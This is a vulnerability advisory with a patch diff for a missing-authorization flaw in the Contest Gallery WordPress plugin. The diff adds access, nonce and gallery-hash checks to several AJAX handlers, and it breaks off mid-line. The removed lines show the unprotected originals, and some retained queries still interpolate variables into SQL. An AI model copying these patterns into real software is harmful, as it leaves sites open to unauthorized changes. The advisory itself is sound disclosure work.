CVE-2026-42657: Contest Gallery – Upload & Vote Photos, Media, Sell with PayPal & Stripe <= 28.1.7 – Missing Authorization (contest-gallery)

--- a/contest-gallery/ajax/ajax-functions-backend.php
+++ b/contest-gallery/ajax/ajax-functions-backend.php
@@ -1,10 +1,60 @@
 <?php
+if (!function_exists('cg_backend_ajax_error_json')) {
+    function cg_backend_ajax_error_json($message, $status = 400, $code = 'cg_backend_ajax_error') {
+        wp_send_json_error(array(
+            'message' => $message,
+            'code' => $code
+        ), $status);
+    }
+}
+
+if (!function_exists('cg_backend_ajax_require_access_json')) {
+    function cg_backend_ajax_require_access_json() {
+        if (!defined('DOING_AJAX') || !DOING_AJAX) {
+            cg_backend_ajax_error_json('Invalid AJAX request.', 400, 'cg_invalid_ajax_request');
+        }
+
+        if (!is_user_logged_in() || !cg_user_has_backend_access()) {
+            cg_backend_ajax_error_json('This area can be edited only as administrator, editor or author.', 403, 'cg_missing_rights');
+        }
+
+        $cg_nonce = '';
+        if (isset($_POST['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_POST['cg_nonce']);
+        } elseif (isset($_GET['cg_nonce'])) {
+            $cg_nonce = sanitize_text_field($_GET['cg_nonce']);
+        }
+
+        if (empty($cg_nonce) || !wp_verify_nonce($cg_nonce, 'cg_nonce')) {
+            wp_send_json_error(array(
+                'message' => 'WP nonce security token not set or not valid anymore.',
+                'code' => 'cg_nonce_invalid',
+                'version' => cg_get_version()
+            ), 403);
+        }
+    }
+}
+
+if (!function_exists('cg_backend_ajax_validate_gallery_hash_json')) {
+    function cg_backend_ajax_validate_gallery_hash_json($GalleryID, $galleryHash) {
+        $GalleryID = absint($GalleryID);
+        if (empty($GalleryID) || empty($galleryHash)) {
+            cg_backend_ajax_error_json('Missing gallery validation data.', 403, 'cg_missing_gallery_hash');
+        }
+
+        $galleryHashToCompare = md5(wp_salt('auth') . '---cngl1---' . $GalleryID);
+        if ($galleryHash !== $galleryHashToCompare) {
+            cg_backend_ajax_error_json('Invalid gallery validation data.', 403, 'cg_invalid_gallery_hash');
+        }
+    }
+}
+
 // post_cg_get_current_permalinks
 add_action('wp_ajax_post_cg_get_current_permalinks', 'post_cg_get_current_permalinks');
 if (!function_exists('post_cg_get_current_permalinks')) {
     function post_cg_get_current_permalinks() {

-        cg_check_nonce();
+        cg_require_backend_access();

         global $wpdb;
         $tablename = $wpdb->prefix . "contest_gal1ery";
@@ -54,10 +104,8 @@

 // create PDF preview
 add_action('wp_ajax_post_cg_create_pdf_preview_backend', 'post_cg_create_pdf_preview_backend');
-if (!function_exists('post_cg_create_pdf_preview_backend')) {
-    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
-
-        cg_check_nonce();
+if (!function_exists('cg_create_pdf_preview_internal')) {
+    function cg_create_pdf_preview_internal($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {

         global $wpdb;
         $tablename_posts = $wpdb->prefix . "posts";
@@ -67,138 +115,149 @@

         $_POST = cg1l_sanitize_post($_POST);

-        //var_dump(33444);
-        //var_dump($_POST);
+        $result = [
+            'ok' => false,
+            'attach_id' => 0,
+            'preview_url' => '',
+            'error' => ''
+        ];

-        // create image attachment
         $wp_upload_dir = wp_upload_dir();
-        $currentUploadDir = $wp_upload_dir['basedir'];
-        $cgWpUploadToReplace = '';
-        $cgNewWpUploadWhichReplace = '';
-        if(empty($WpUpload)){
-            $WpUpload = absint($_POST['cg_wp_upload']);
+        $cgWpUploadToReplace = 0;
+        $cgNewWpUploadWhichReplace = 0;
+        if (empty($WpUpload)) {
+            $WpUpload = (!empty($_POST['cg_wp_upload'])) ? absint($_POST['cg_wp_upload']) : 0;
         }
-        if(empty($realId)){
-            $realId = absint($_POST['cgRealId']);
+        if (empty($realId)) {
+            $realId = (!empty($_POST['cgRealId'])) ? absint($_POST['cgRealId']) : 0;
         }
-        if(empty($cg_base_64)){
+        if (empty($cg_base_64)) {
             $cg_base_64 = (!empty($_POST['cg_base_64'])) ? $_POST['cg_base_64'] : '';
         }
-        if(!empty($_POST['cgWpUploadToReplace'])){
+        if (!empty($_POST['cgWpUploadToReplace'])) {
             $cgWpUploadToReplace = absint($_POST['cgWpUploadToReplace']);
         }
-        if(!empty($_POST['cgNewWpUploadWhichReplace'])){
+        if (!empty($_POST['cgNewWpUploadWhichReplace'])) {
             $cgNewWpUploadWhichReplace = absint($_POST['cgNewWpUploadWhichReplace']);
         }

-        $realIdRow = $wpdb->get_row( "SELECT * FROM $tablename WHERE id='$realId'" );
-        $WpUploadRow = $wpdb->get_row( "SELECT * FROM $tablename_posts WHERE ID='$WpUpload'" );
+        if (empty($WpUpload) || empty($realId)) {
+            $result['error'] = 'missing_parameters';
+            return $result;
+        }
+
+        $realIdRow = $wpdb->get_row("SELECT * FROM $tablename WHERE id='$realId'");
+        if (empty($realIdRow)) {
+            $result['error'] = 'missing_real_id_row';
+            return $result;
+        }

-        //var_dump('$cgWpUploadToReplace456');
-        //var_dump($cgWpUploadToReplace);
-        //var_dump('$cgNewWpUploadWhichReplace456');
-        //var_dump($cgNewWpUploadWhichReplace);
+        $WpUploadRow = $wpdb->get_row("SELECT * FROM $tablename_posts WHERE ID='$WpUpload'");
+        if (empty($WpUploadRow)) {
+            $result['error'] = 'missing_wp_upload_row';
+            return $result;
+        }

-        if(!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace)  && !empty($realIdRow->EcommerceEntry)){
+        if (!empty($cgWpUploadToReplace) && !empty($cgNewWpUploadWhichReplace) && !empty($realIdRow->EcommerceEntry)) {
             $EcommerceEntry = $realIdRow->EcommerceEntry;
-            $ecommerceEntry = $wpdb->get_row( "SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'" );
+            $ecommerceEntry = $wpdb->get_row("SELECT * FROM $tablename_ecommerce_entries WHERE id='$EcommerceEntry'");
             $removedWpUploadIdsFromSale = [$cgWpUploadToReplace];
-            //var_dump('cg_replace_ecommerce_file');
-            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [],$removedWpUploadIdsFromSale);
+            cg_replace_ecommerce_file($realIdRow->id, $realIdRow->GalleryID, $ecommerceEntry, $cgNewWpUploadWhichReplace, [], $removedWpUploadIdsFromSale);
         }

-        // check multiple files
         $multipleFilesPdfPreview = 0;
         $multipleFilesTitle = '';
-        if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+        if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
             $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-            foreach($MultipleFiles as $file){
-                if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])){
-                    // post_title
-                    $multipleFilesPdfPreview = $file['PdfPreview'];// set for multiple files then
+            foreach ($MultipleFiles as $file) {
+                if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && !empty($file['PdfPreview'])) {
+                    $multipleFilesPdfPreview = $file['PdfPreview'];
                     $multipleFilesTitle = $file['post_title'];
                 }
             }
         }

-        //var_dump($realIdRow->PdfPreview);
-        //var_dump(get_post( $realIdRow->PdfPreview ));
-        if(!empty($realIdRow->PdfPreview) && !empty(get_post( $realIdRow->PdfPreview )) && $WpUpload == $realIdRow->WpUpload){
-            if(!$isFromFrontendUpload){
-                $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
-                echo 'cg_guid###'.$PdfPreviewImage[0].'###cg_guid_end';
-            }
-        }elseif(!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))){// set for multiple files then
-            if(!$isFromFrontendUpload){
-                $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
-                echo 'cg_guid###'.$multipleFilesPdfPreviewImage[0].'###cg_guid_end';
-            }
-        }else{
-            //var_dump(222);
+        if (!empty($realIdRow->PdfPreview) && !empty(get_post($realIdRow->PdfPreview)) && $WpUpload == $realIdRow->WpUpload) {
+            $PdfPreviewImage = wp_get_attachment_image_src($realIdRow->PdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($realIdRow->PdfPreview);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        } elseif (!empty($multipleFilesPdfPreview) && !empty(get_post($multipleFilesPdfPreview))) {
+            $multipleFilesPdfPreviewImage = wp_get_attachment_image_src($multipleFilesPdfPreview, 'large');
+            $result['ok'] = true;
+            $result['attach_id'] = absint($multipleFilesPdfPreview);
+            $result['preview_url'] = (!empty($multipleFilesPdfPreviewImage[0])) ? $multipleFilesPdfPreviewImage[0] : '';
+            return $result;
+        } else {
             $content = base64_decode(preg_replace('#^data:image/w+;base64,#i', '', $cg_base_64));
+            if (empty($content)) {
+                $result['error'] = 'missing_preview_payload';
+                return $result;
+            }
+
             $formImage = imagecreatefromstring($content);
+            if (!$formImage) {
+                $result['error'] = 'invalid_preview_payload';
+                return $result;
+            }

-            if(!empty($multipleFilesPdfPreview)){
-                $fullName = $multipleFilesTitle.'-cg-pdf-preview';
-            }else{
-                $fullName = $WpUploadRow->post_title.'-cg-pdf-preview';
+            if (!empty($multipleFilesPdfPreview)) {
+                $fullName = $multipleFilesTitle . '-cg-pdf-preview';
+            } else {
+                $fullName = $WpUploadRow->post_title . '-cg-pdf-preview';
             }
             $fullNamePath = $fullName;
             $fullNamePath = cg_pre_process_name_for_url_name($fullNamePath);
             $fullNamePath = cg_check_first_char_for_url_name_after_pre_processing($fullNamePath);
             $fullNamePath = cg_check_last_char_for_url_name_after_pre_processing($fullNamePath);
-            $fullNamePath = cg_sluggify_for_url($fullNamePath);// has to be tested with asia chars one time
+            $fullNamePath = cg_sluggify_for_url($fullNamePath);
             $fullNamePathFirst = $fullNamePath;

-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePathFirst.'.png';
-            //var_dump('$fullPath check');
-            //var_dump($fullPath);
-            if(file_exists($fullPath)){
-                //var_dump(112233);
+            $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePathFirst . '.png';
+            if (file_exists($fullPath)) {
                 $i = 0;
-                do{
-                    if($i==0){
+                do {
+                    if ($i == 0) {
                         $i = 1;
-                    }else{
+                    } else {
                         $i++;
                     }
-                    $add = '-'.$i;
-                    $fullNamePath = $fullNamePathFirst.$add;
-                    $fullPath = $wp_upload_dir['basedir'].$wp_upload_dir['subdir'].'/'.$fullNamePath.'.png';
-                }while(file_exists($fullPath));
+                    $add = '-' . $i;
+                    $fullNamePath = $fullNamePathFirst . $add;
+                    $fullPath = $wp_upload_dir['basedir'] . $wp_upload_dir['subdir'] . '/' . $fullNamePath . '.png';
+                } while (file_exists($fullPath));
             }

-            //var_dump('$fullPath');
-            //var_dump($fullPath);
-
-            //var_dump('$fullName');
-            //var_dump($fullName);
-
-            // for png
-            imagesavealpha($formImage,true);// required for png images... otherwise background black
-
-            //imagejpeg($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            //imagegif($formImage,$WpUploadFilesPostBaseUrls[$base64WatermarkedAndAltFilesWpUploadId]);
-            imagepng($formImage,$fullPath);
-
-            //file_put_contents($fullNewPath,$content);
+            imagesavealpha($formImage, true);
+            imagepng($formImage, $fullPath);
+
+            if (!file_exists($fullPath)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_file_not_created';
+                return $result;
+            }

             $attachment = array(
-                'guid' => $wp_upload_dir['url']."/".$fullNamePath.'.png',
+                'guid' => $wp_upload_dir['url'] . "/" . $fullNamePath . '.png',
                 'post_mime_type' => 'image/png',
                 'post_title' => $fullName,
                 'post_content' => '',
                 'post_status' => 'inherit'
             );

-            $attach_id = wp_insert_attachment( $attachment, $fullPath );
-            $imagenew = get_post( $attach_id );
-            $fullsizepath = get_attached_file( $imagenew->ID );
-            $attach_data = wp_generate_attachment_metadata( $attach_id, $fullsizepath );
-            wp_update_attachment_metadata( $attach_id, $attach_data );
+            $attach_id = wp_insert_attachment($attachment, $fullPath);
+            if (empty($attach_id) || is_wp_error($attach_id)) {
+                imagedestroy($formImage);
+                $result['error'] = 'preview_attachment_insert_failed';
+                return $result;
+            }
+
+            $imagenew = get_post($attach_id);
+            $fullsizepath = get_attached_file($imagenew->ID);
+            $attach_data = wp_generate_attachment_metadata($attach_id, $fullsizepath);
+            wp_update_attachment_metadata($attach_id, $attach_data);
+            imagedestroy($formImage);

             $wpdb->query($wpdb->prepare(
                 "
@@ -206,37 +265,30 @@
 						(id, WpUpload, WpUploadPreview)
 						VALUES ( %s,%d,%d)
 					",
-                '',$WpUpload,$attach_id
+                '', $WpUpload, $attach_id
             ));

             $multipleFilesWpUploadForPdfPreview = 0;

-            if(!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles!='""'){
+            if (!empty($realIdRow->MultipleFiles) && $realIdRow->MultipleFiles != '""') {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
-                foreach($MultipleFiles as $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload){
+                foreach ($MultipleFiles as $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload) {
                         $multipleFilesWpUploadForPdfPreview = $WpUpload;
                     }
                 }
             }

-            //var_dump('$multipleFilesWpUploadForPdfPreview');
-            //var_dump($multipleFilesWpUploadForPdfPreview);
-
-            if(!empty($multipleFilesWpUploadForPdfPreview)){
-                //var_dump('$multipleFilesPdfPreview');
-                //var_dump($multipleFilesPdfPreview);
+            if (!empty($multipleFilesWpUploadForPdfPreview)) {
                 $MultipleFiles = unserialize($realIdRow->MultipleFiles);
                 $MultipleFilesNew = [];
-                foreach($MultipleFiles as $order => $file){
-                    if(empty($file['isRealIdSource']) && $file['post_mime_type']=='application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload){
-                        //var_dump('set PdfPreview');
+                foreach ($MultipleFiles as $order => $file) {
+                    if (empty($file['isRealIdSource']) && $file['post_mime_type'] == 'application/pdf' && $file['WpUpload'] == $WpUpload && $multipleFilesWpUploadForPdfPreview == $WpUpload) {
                         $file['PdfPreview'] = $attach_id;
                         $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'full');
                         $file['PdfPreviewImage'] = $PdfPreviewImage[0];
                         $PdfPreviewImageLarge = wp_get_attachment_image_src($attach_id, 'large');
                         $file['PdfPreviewImageLarge'] = $PdfPreviewImageLarge[0];
-                        // important to set PdfOriginal
                         $file['PdfOriginal'] = get_the_guid($file['WpUpload']);
                         $file['full'] = $PdfPreviewImage[0];
                         $file['guid'] = $PdfPreviewImage[0];
@@ -251,42 +303,46 @@
                     }
                     $MultipleFilesNew[$order] = $file;
                 }
-                /*echo "<pre>";
-                    print_r($MultipleFilesNew);
-                echo "</pre>";*/
                 $MultipleFilesNew = serialize($MultipleFilesNew);
-                //var_dump('$realId set MultipleFiles');
-                //var_dump($realId);
-                // SET MultipleFiles='$MultipleFilesNew' ... serialized $MultipleFilesNew has to be in ''
                 $wpdb->query("UPDATE $tablename SET MultipleFiles='$MultipleFilesNew' WHERE id = $realId");
-            }else{
-                //var_dump('$realId set PdfPreview');
+            } else {
                 $wpdb->query("UPDATE $tablename SET PdfPreview=$attach_id WHERE id = $realId");
             }

-            if(!$isFromFrontendUpload){
-                if(!empty($realIdRow->Active)){
-                    $uploadFolder = wp_upload_dir();
-                    $thumbSizesWp = array();
-                    $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
-                    $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
-                    $thumbSizesWp['large_size_w'] = get_option("large_size_w");
-                    $imageArray = array();
-                    $pid = $realIdRow->id;
-                    $GalleryID = $realIdRow->GalleryID;
-                    $row = $wpdb->get_row( "SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
-                          OR
-                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
+            if (!$isFromFrontendUpload && !empty($realIdRow->Active)) {
+                $uploadFolder = wp_upload_dir();
+                $thumbSizesWp = array();
+                $thumbSizesWp['thumbnail_size_w'] = get_option("thumbnail_size_w");
+                $thumbSizesWp['medium_size_w'] = get_option("medium_size_w");
+                $thumbSizesWp['large_size_w'] = get_option("large_size_w");
+                $imageArray = array();
+                $pid = $realIdRow->id;
+                $GalleryID = $realIdRow->GalleryID;
+                $row = $wpdb->get_row("SELECT DISTINCT $tablename_posts.*, $tablename.* FROM $tablename_posts, $tablename WHERE
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' and $tablename_posts.ID = $tablename.WpUpload)
+                          OR
+                          (($tablename.id = $pid) AND $tablename.GalleryID='$GalleryID' AND $tablename.Active='1' AND $tablename.WpUpload = 0)
                           GROUP BY $tablename.id  ORDER BY $tablename.id DESC LIMIT 0, 1");
-                    cg_create_json_files_when_activating($GalleryID,$row,$thumbSizesWp,$uploadFolder,$imageArray);
-                }
+                cg_create_json_files_when_activating($GalleryID, $row, $thumbSizesWp, $uploadFolder, $imageArray);
+            }

-                $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');
-                $PdfPreviewImage = $PdfPreviewImage[0];
+            $PdfPreviewImage = wp_get_attachment_image_src($attach_id, 'large');

-                echo 'cg_guid###'.$PdfPreviewImage.'###cg_guid_end';
-            }
+            $result['ok'] = true;
+            $result['attach_id'] = absint($attach_id);
+            $result['preview_url'] = (!empty($PdfPreviewImage[0])) ? $PdfPreviewImage[0] : '';
+            return $result;
+        }
+    }
+}
+if (!function_exists('post_cg_create_pdf_preview_backend')) {
+    function post_cg_create_pdf_preview_backend($WpUpload = 0, $realId = 0, $cg_base_64 = '', $isFromFrontendUpload = false) {
+        cg_require_backend_access();
+        $result = cg_create_pdf_preview_internal($WpUpload, $realId, $cg_base_64, $isFromFrontendUpload);
+        if (!empty($result['ok']) && !$isFromFrontendUpload && !empty($result['preview_url'])) {
+            echo 'cg_guid###' . $result['preview_url'] . '###cg_guid_end';
+        } elseif (empty($result['ok'])) {
+            echo 'cg_error###' . $result['error'] . '###cg_error_end';
         }
     }
 }
@@ -296,212 +352,275 @@
 if (!function_exists('post_cg_move_to_another_gallery_get_inputs')) {
 	function post_cg_move_to_another_gallery_get_inputs() {

-    global $wpdb;
-    $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
-    $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
-    $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+        cg_backend_ajax_require_access_json();
+        $_POST = cg1l_sanitize_post($_POST);

-    $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+        $MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+        $galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';
+        cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-    $contact_forms_by_gallery_id = [];
-    foreach ($contact_forms as $form){
-        if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
-	        $contact_forms_by_gallery_id[$form->GalleryID] = [];
-        }
-	    if(is_serialized($form->Field_Content)){
-		    $form->Field_Content = unserialize($form->Field_Content);
+        global $wpdb;
+        $tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+        $tablenameOptions = $wpdb->prefix . "contest_gal1ery_options";
+        $tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+        $contact_forms = $wpdb->get_results("SELECT * FROM $tablename_form_input WHERE id > 0");
+
+        $contact_forms_by_gallery_id = [];
+        foreach ($contact_forms as $form){
+            if(!isset($contact_forms_by_gallery_id[$form->GalleryID])){
+                $contact_forms_by_gallery_id[$form->GalleryID] = [];
+            }
+            if(is_serialized($form->Field_Content)){
+                $form->Field_Content = unserialize($form->Field_Content);
+            }
+            $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
         }
-	    $contact_forms_by_gallery_id[$form->GalleryID][] = $form;
-    }

-		$galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
-		$allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
-		$allCategoriesByGalleryIDArray = [];
+        $galleryIDs = $wpdb->get_results("SELECT id FROM $tablenameOptions WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryID = $wpdb->get_results("SELECT id, GalleryID, Name FROM $tablename_categories WHERE id >= 1 ORDER BY id DESC");
+        $allCategoriesByGalleryIDArray = [];
         foreach ($allCategoriesByGalleryID as $row){
             if(!isset($allCategoriesByGalleryIDArray[$row->GalleryID])){
-	            $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
+                $allCategoriesByGalleryIDArray[$row->GalleryID] = [];
             }
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
-	        $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id] = [];
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['id'] = $row->id;
+            $allCategoriesByGalleryIDArray[$row->GalleryID][$row->id]['name'] = $row->Name;
         }

-		?>
-    <script data-cg-processing="true">
-        cgJsClassAdmin.gallery.vars.allCategoriesByGalleryID = <?php echo json_encode($allCategoriesByGalleryIDArray);?>;
-        cgJsClassAdmin.gallery.vars.galleryIDs = <?php echo json_encode($galleryIDs);?>;// renew here for sure
-        cgJsClassAdmin.gallery.vars.contact_forms_by_gallery_id = <?php echo json_encode($contact_forms_by_gallery_id); ?>;
-    </script>
-<?php
+        wp_send_json_success(array(
+            'allCategoriesByGalleryID' => $allCategoriesByGalleryIDArray,
+            'galleryIDs' => $galleryIDs,
+            'contact_forms_by_gallery_id' => $contact_forms_by_gallery_id
+        ));

         }
-}
+	}

 // move to another gallery
 add_action('wp_ajax_post_cg_move_to_another_gallery', 'post_cg_move_to_another_gallery');
 if (!function_exists('post_cg_move_to_another_gallery')) {
 	function post_cg_move_to_another_gallery()
 	{
+		cg_backend_ajax_require_access_json();
 		contest_gal1ery_db_check();

 		$_POST = cg1l_sanitize_post($_POST);

-		$isBackendCall = true;
-		$isAjaxCall = true;
-
-		$isAjaxCategoriesCall = true;
-
-		global $wp_version;
-		$sanitize_textarea_field = ($wp_version < 4.7) ? 'sanitize_text_field' : 'sanitize_textarea_field';
+		$cgMoveRealId = (!empty($_POST['cgMoveRealId'])) ? absint($_POST['cgMoveRealId']) : 0;
+		$InGalleryIDtoMove = (!empty($_POST['cg_in_gallery_id_to_move'])) ? absint($_POST['cg_in_gallery_id_to_move']) : 0;
+		$MoveFromGalleryID = (!empty($_POST['cgMoveFromGalleryID'])) ? absint($_POST['cgMoveFromGalleryID']) : 0;
+		$cgMoveCategory = (!empty($_POST['cgMoveCategory'])) ? absint($_POST['cgMoveCategory']) : 0;
+		$MoveAssignsRaw = (!empty($_POST['cgMoveAssigns']) && is_array($_POST['cgMoveAssigns'])) ? $_POST['cgMoveAssigns'] : array();
+		$galleryHash = (!empty($_POST['cgGalleryHash'])) ? $_POST['cgGalleryHash'] : '';

-		$cgVersion = cg_get_version_for_scripts();
+		cg_backend_ajax_validate_gallery_hash_json($MoveFromGalleryID, $galleryHash);

-		if (defined('DOING_AJAX') && DOING_AJAX) {
-
-			$user = wp_get_current_user();
+		if (empty($cgMoveRealId) || empty($InGalleryIDtoMove) || empty($MoveFromGalleryID)) {
+			cg_backend_ajax_error_json('Missing move request data.', 400, 'cg_missing_move_data');
+		}

-			if (
-				is_super_admin($user->ID) ||
-				in_array('administrator', (array)$user->roles) ||
-				in_array('editor', (array)$user->roles) ||
-				in_array('author', (array)$user->roles)
-			) {
+		if ($InGalleryIDtoMove == $MoveFromGalleryID) {
+			cg_backend_ajax_error_json('Entry can not be moved to the same gallery.', 400, 'cg_same_gallery_move');
+		}

-				$cgMoveRealId = absint($_POST['cgMoveRealId']);
-				$InGalleryIDtoMove = absint($_POST['cg_in_gallery_id_to_move']);
-				$MoveFromGalleryID = absint($_POST['cgMoveFromGalleryID']);
-				$cgMoveCategory = absint($_POST['cgMoveCategory']);
-				$MoveAssigns = $_POST['cgMoveAssigns'];
+		global $wpdb;
+		$table_posts = $wpdb->prefix . "posts";
+		$tablename = $wpdb->prefix . "contest_gal1ery";
+		$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
+		$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
+		$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
+		$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$tablename_form_input = $wpdb->prefix . "contest_gal1ery_f_input";
+		$tablename_categories = $wpdb->prefix . "contest_gal1ery_categories";
+
+		$sourceGalleryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_options WHERE id = %d", $MoveFromGalleryID));
+		if (empty($sourceGalleryExists)) {
+			cg_backend_ajax_error_json('Source gallery does not exist.', 400, 'cg_source_gallery_missing');
+		}

-				global $wpdb;
-				$table_posts = $wpdb->prefix . "posts";
-				$tablename = $wpdb->prefix . "contest_gal1ery";
-				$tablename_options = $wpdb->prefix . "contest_gal1ery_options";
-				$tablename_comments = $wpdb->prefix . "contest_gal1ery_comments";
-				$tablename_entries = $wpdb->prefix . 'contest_gal1ery_entries';
-				$tablename_ip = $wpdb->prefix . "contest_gal1ery_ip";
+		$optionsInGalleryToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename_options WHERE id = %d ORDER BY id DESC LIMIT 0, 1", $InGalleryIDtoMove));
+		if (empty($optionsInGalleryToMove)) {
+			cg_backend_ajax_error_json('Target gallery does not exist.', 400, 'cg_target_gallery_missing');
+		}

-				$insert_id = cg_copy_table_row('contest_gal1ery',$cgMoveRealId, $valueCollect = [], $cgCopyType = '');
+		$rowToMove = $wpdb->get_row($wpdb->prepare("SELECT * FROM $tablename WHERE id = %d AND GalleryID = %d", $cgMoveRealId, $MoveFromGalleryID));
+		if (empty($rowToMove)) {
+			cg_backend_ajax_error_json('Entry does not belong to the selected source gallery.', 400, 'cg_entry_source_mismatch');
+		}

-				$Version = cg_get_version_for_scripts();
+		if (!empty($rowToMove->EcommerceEntry)) {
+			cg_backend_ajax_error_json('E-commerce entries can not be moved to another gallery.', 400, 'cg_ecommerce_entry_move_blocked');
+		}

-				$wpdb->update(
-					"$tablename",
-					array('Version' => $Version,'GalleryID' => $InGalleryIDtoMove),
-					array('id' => $insert_id),
-					array('%s'),
-					array('%d')
-				);
+		if (!empty($cgMoveCategory)) {
+			$categoryExists = $wpdb->get_var($wpdb->prepare("SELECT COUNT(*) FROM $tablename_categories WHERE id = %d AND GalleryID = %d", $cgMoveCategory, $InGalleryIDtoMove));
+			if (empty($categoryExists)) {
+				cg_backend_ajax_error_json('Selected target category does not belong to the target gallery.', 400, 'cg_target_category_mismatch');
+			}
+		}

-				$row = $wpdb->get_row("SELECT * FROM $tablename WHERE id = $insert_id");
+		$MoveAssigns = array();
+		if (!empty($MoveAssignsRaw)) {
+			$formInputs = $wpdb->get_results($wpdb->prepare("SELECT id, GalleryID, Field_Type FROM $tablename_form_input WHERE GalleryID IN (%d,%d)", $MoveFromGalleryID, $InGalleryIDtoMove));
+			$sourceFields = array();
+			$targetFields = array();
+			foreach ($formInputs as $formInput) {
+				if (absint($formInput->GalleryID) == $MoveFromGalleryID) {
+					$sourceFields[absint($formInput->id)] = $formInput->Field_Type;
+				} elseif (absint($formInput->GalleryID) == $InGalleryIDtoMove) {
+					$targetFields[absint($formInput->id)] = $formInput->Field_Type;
+				}
+			}

-				// Delete previous entry because inserted as new one through cg_copy_table_row
-				$wpdb->query("DELETE FROM $tablename WHERE id = $cgMoveRealId");
+			$allowedMoveFieldTypes = array('date-f', 'text-f', 'url-f', 'email-f', 'comment-f', 'select-f', 'radio-f', 'chk-f');
+			$usedTargetFields = array();
+			foreach ($MoveAssignsRaw as $FromInput => $ToInput) {
+				$FromInput = absint($FromInput);
+				$ToInput = absint($ToInput);

-                // delete WpPages now
-				if(!empty($row->WpPage)){
-					wp_delete_post($row->WpPage,true);
+				if (empty($FromInput) || empty($ToInput)) {
+					cg_backend_ajax_error_json('Invalid field assignment data.', 400, 'cg_invalid_move_assignment');
 				}
-				if(!empty($row->WpPageUser)){
-					wp_delete_post($row->WpPageUser,true);
+				if (empty($sourceFields[$FromInput]) || empty($targetFields[$ToInput])) {
+					cg_backend_ajax_error_json('Field assignment does not belong to the selected galleries.', 400, 'cg_move_assignment_gallery_mismatch');
 				}
-				if(!empty($row->WpPageNoVoting)){
-					wp_delete_post($row->WpPageNoVoting,true);
+				if (!in_array($sourceFields[$FromInput], $allowedMoveFieldTypes, true) || $sourceFields[$FromInput] != $targetFields[$ToInput]) {
